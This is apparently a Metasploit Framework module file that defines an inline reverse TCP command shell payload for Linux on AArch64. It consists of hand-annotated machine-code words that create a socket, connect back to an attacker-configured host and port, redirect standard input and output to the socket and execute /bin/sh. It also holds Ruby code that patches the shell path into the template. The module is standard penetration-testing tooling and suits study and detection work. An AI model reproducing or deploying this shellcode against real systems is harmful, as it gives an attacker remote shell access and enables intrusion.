GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
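# Linux/AArch64 single (inline) reverse TCP command shell payload.
#
# The machine code below is a fixed 152-byte template (38 little-endian
# 32-bit words, matching CachedSize):
#
#   bytes   0..127  32 instructions
#   bytes 128..135  sockaddr_in template (family, port, IPv4 address)
#   bytes 136..151  16-byte, zero-filled slot for the shell path
#
# A process running this code issues, in order: socket, connect, dup3 (x3),
# execve, and finally exit (reached directly when connect fails). That fixed
# syscall order is what audit or seccomp telemetry would record for it.
module MetasploitModule
  CachedSize = 152

  include Msf::Payload::Single
  include Msf::Payload::Linux::Aarch64::Prepends
  include Msf::Sessions::CommandShellOptions

  # Declares the payload metadata, the machine-code template and the SHELL
  # option.
  #
  # @param info [Hash] caller-supplied module info, merged with the defaults
  #   below through merge_info
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Command Shell, Reverse TCP Inline',
        'Description' => 'Connect back to attacker and spawn a command shell',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_AARCH64,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        'Payload' => {
          # Byte positions inside the template that hold the connect-back
          # address: LPORT is the upper half of the word at byte 128
          # ('n' = 16-bit network order), LHOST is the word at byte 132.
          'Offsets' =>
            {
              'LHOST' => [ 132, 'ADDR' ],
              'LPORT' => [ 130, 'n' ]
            },
          'Payload' =>
            [
              # Generated from external/source/shellcode/linux/aarch64/single_reverse_tcp_shell.s
              #
              # AArch64 Linux passes the syscall number in x8 and arguments in
              # x0.. ; the syscall names given below are from the generic
              # Linux syscall table used by arm64.

              # socket(AF_INET = 2, SOCK_STREAM = 1, 0) -- syscall 198
              0xd2800040, # mov x0, #0x2 // #2
              0xd2800021, # mov x1, #0x1 // #1
              0xd2800002, # mov x2, #0x0 // #0
              0xd28018c8, # mov x8, #0xc6 // #198
              0xd4000001, # svc #0x0
              0xaa0003e3, # mov x3, x0 (keep the socket fd)

              # connect(fd, &sockaddr, 16) -- syscall 203; non-zero result jumps to exit
              0x10000341, # adr x1, 80 <sockaddr>
              0xd2800202, # mov x2, #0x10 // #16
              0xd2801968, # mov x8, #0xcb // #203
              0xd4000001, # svc #0x0
              0x35000260, # cbnz w0, 74 <exit>

              # dup3(..., 0|1|2, 0) -- syscall 24, three times. x0 is loaded with the
              # socket fd only before the first call; the later calls reuse the
              # value left in x0 by the previous svc.
              0xaa0303e0, # mov x0, x3
              0xd2800002, # mov x2, #0x0 // #0
              0xd2800001, # mov x1, #0x0 // #0
              0xd2800308, # mov x8, #0x18 // #24
              0xd4000001, # svc #0x0
              0xd2800021, # mov x1, #0x1 // #1
              0xd2800308, # mov x8, #0x18 // #24
              0xd4000001, # svc #0x0
              0xd2800041, # mov x1, #0x2 // #2
              0xd2800308, # mov x8, #0x18 // #24
              0xd4000001, # svc #0x0

              # execve(shell, [shell, NULL], NULL) -- syscall 221; argv is built on the stack
              0x10000180, # adr x0, 88 <shell>
              0xd2800002, # mov x2, #0x0 // #0
              0xf90003e0, # str x0, [sp]
              0xf90007e2, # str x2, [sp,#8]
              0x910003e1, # mov x1, sp
              0xd2801ba8, # mov x8, #0xdd // #221
              0xd4000001, # svc #0x0

              # exit(0) -- syscall 93 (label <exit>, byte 0x74)
              0xd2800000, # mov x0, #0x0 // #0
              0xd2800ba8, # mov x8, #0x5d // #93
              0xd4000001, # svc #0x0

              # sockaddr (byte 0x80): with 'V' packing these two words become
              # 02 00 | 11 5c | 7f 00 00 01, i.e. family 2, port 4444 and
              # 127.0.0.1 as placeholder values at the 'Offsets' positions.
              0x5c110002, # .word 0x5c110002
              0x0100007f, # .word 0x0100007f

              # shell (byte 0x88): 16 zero bytes, filled in by #generate
              0x00000000, # .word 0x00000000 // shell
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
              0x00000000, # .word 0x00000000
            ].pack('V*')
        }
      )
    )

    # Register command execution options
    register_options(
      [
        OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ]),
      ]
    )
  end

  # Builds the payload bytes and writes the configured shell path into the
  # 16-byte slot at byte 136 of the template.
  #
  # The path must leave at least one of the slot's zero bytes untouched,
  # because that byte is the string terminator execve relies on. The limit is
  # therefore enforced on the encoded byte length, not the character count:
  # a path with multi-byte characters can have fewer than 16 characters and
  # still overrun the slot.
  #
  # NOTE(review): index 136 is relative to the template defined in
  # #initialize; this assumes `super` returns that template without extra
  # leading bytes -- confirm against the Prepends mixin.
  #
  # @param _opts [Hash] passed on unchanged to the parent implementation by
  #   the bare `super`
  # @return [String] payload bytes with the SHELL path patched in
  # @raise [ArgumentError] if the SHELL value is 16 bytes or longer
  def generate(_opts = {})
    raw = super

    # Work on a binary copy so size check and splice both count bytes.
    shell = datastore['SHELL'].b
    raise ArgumentError, 'The specified shell must be less than 16 bytes.' if shell.bytesize >= 16

    raw[136, shell.bytesize] = shell

    raw
  end
end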